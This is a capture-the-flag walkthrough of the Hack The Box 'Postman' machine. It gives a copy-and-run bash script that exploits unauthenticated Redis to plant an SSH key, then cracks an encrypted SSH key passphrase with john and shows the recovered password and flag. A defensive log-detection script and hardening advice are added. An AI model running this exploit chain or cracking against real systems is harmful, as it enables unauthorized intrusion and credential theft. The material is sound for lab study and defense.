Hack The Box Postman


Let's find some services and ports we can work with.

nmap 10.10.10.160

The Redis service on port 6379 looks like the best approach for an initial foothold. Using telnet we should be able to connect to the Redis service so we can enumerate further.

telnet 10.10.10.160 6379

That should have opened a connection; to view some information about Redis we can simply type "info":

telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
info

Now we need to exploit the Redis service by uploading our own SSH key; I will add details of exactly what is going on at a later date.

Below I've created a handy script to automate the entire process: copy the text below, save it on your local machine, make it executable and run the script.

cd ~/.ssh
# copy the bash text below into bamboohax.sh
nano bamboohax.sh
# save and exit, then make it executable
chmod +x bamboohax.sh
# run the script
./bamboohax.sh

#!/bin/bash
# Created by bamboohax
# Generates a fresh key pair and, through the unauthenticated Redis instance,
# gets the public key written to /var/lib/redis/.ssh/authorized_keys for the
# redis user. Run it from ~/.ssh so id_rsa.pub is in the working directory.
rm /root/.ssh/id*                        # removes any existing key pair (destructive)
ssh-keygen -t rsa                        # interactive; accept the default path
# pad the key with blank lines so it stays intact inside the RDB dump
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > bamboohax
redis-cli -h 10.10.10.160 flushall       # empty the DB so the dump contains only our key
cat bamboohax | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh
redis-cli -h 10.10.10.160 config set dbfilename 'authorized_keys'
redis-cli -h 10.10.10.160 save           # SAVE writes the dump to dir/dbfilename
ssh -i /root/.ssh/id_rsa redis@10.10.10.160
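
From the defender's side, the chain above works only because the instance accepts unauthenticated CONFIG SET and SAVE from the network, and that same command sequence is easy to spot. The script below is an added example (my own, not part of the original writeup or the box) that parses redis-cli MONITOR output and flags any client that retargets dir/dbfilename and then forces a dump; the sample lines and the client address 10.10.14.7 are constructed.

```python
import re
from collections import defaultdict
# redis-cli MONITOR prints one line per command:
#   <unix ts> [<db> <client ip:port>] "CMD" "arg1" "arg2" ...
MONITOR_RE = re.compile(r'^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<addr>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

def parse_monitor_line(line):
    """Split one MONITOR line into timestamp, client address and argv (None if unparseable)."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("addr"),
            "args": ARG_RE.findall(m.group("args"))}

def find_redirected_dumps(lines):
    """Flag clients that changed dir/dbfilename via CONFIG SET and then forced a dump.
    That is the sequence the script above relies on to land a dump at a chosen path."""
    pending = defaultdict(dict)          # client -> {"dir": ..., "dbfilename": ...}
    findings = []
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        cmd = [a.lower() for a in ev["args"]]
        st = pending[ev["client"]]
        if cmd[:2] == ["config", "set"] and len(cmd) >= 4 and cmd[2] in ("dir", "dbfilename"):
            st[cmd[2]] = ev["args"][3]   # keep the value's original case
        elif cmd[0] in ("save", "bgsave") and st:
            findings.append({"client": ev["client"], "ts": ev["ts"],
                             "path": st.get("dir", "<configured dir>") + "/"
                                     + st.get("dbfilename", "dump.rdb")})
            st.clear()                   # one finding per dir/dbfilename change
    return findings

# Constructed sample: a remote client replaying the writeup's sequence, plus a benign local query.
SAMPLE_MONITOR = """\
1582441200.101 [0 10.10.14.7:51234] "flushall"
1582441200.202 [0 10.10.14.7:51234] "set" "crackit" "\\n\\nssh-rsa AAAA...\\n\\n"
1582441200.303 [0 10.10.14.7:51234] "config" "set" "dir" "/var/lib/redis/.ssh"
1582441200.404 [0 10.10.14.7:51234] "config" "set" "dbfilename" "authorized_keys"
1582441200.505 [0 10.10.14.7:51234] "save"
1582441201.000 [0 127.0.0.1:40000] "get" "session:42"
"""

if __name__ == "__main__":
    for f in find_redirected_dumps(SAMPLE_MONITOR.splitlines()):
        print(f"{f['client']} forced a dump to {f['path']} at {f['ts']:.3f}")
```

On a real deployment the same outcome is prevented outright by setting requirepass, keeping protected-mode on, binding to localhost and renaming or disabling the CONFIG command in redis.conf.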
Now that we have a low-privilege shell, finding the other user should be easy; looking in the /home directory we see the user Matt.
After searching through the filesystem I found a backup of an SSH private key.
cd /opt
ls
id_rsa.bak
cat id_rsa.bak 

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
-----END RSA PRIVATE KEY-----

To recover the passphrase we need to brute-force that key, but first we need to get it into a form our password cracker can read; base64 is what we need.

redis@Postman:/opt$ base64 id_rsa.bak > ~/Matt-ssh

Copy the content of Matt-ssh and paste it into a file on your local machine (base64-decode it back into the PEM key); I created a file on my Desktop. Now we can convert it into a format our cracker can work with:

root@kali:/usr/share/john# python ssh2john.py ~/Desktop/Matt-ssh >~/Desktop/crack.txt
Using the tool john, we can brute-force the passphrase:
root@kali:~/Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (/root/Desktop/Matt-ssh)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:09 DONE (2020-02-23 05:02) 0.1035g/s 1484Kp/s 1484Kc/s 1484KC/sa6_123..*7¡Vamos!
Session complete
Now we have a password; let's try logging in as user Matt with the password we brute-forced:
redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ 

Yes, it worked; a quick look around and we have the user.txt file needed to complete the user part.

Matt@Postman:/var/lib/redis$ cd
Matt@Postman:~$ ls
user.txt
Matt@Postman:~$ cat user.txt 
517ad0ec2458ca97af8d93aac08a2f3c
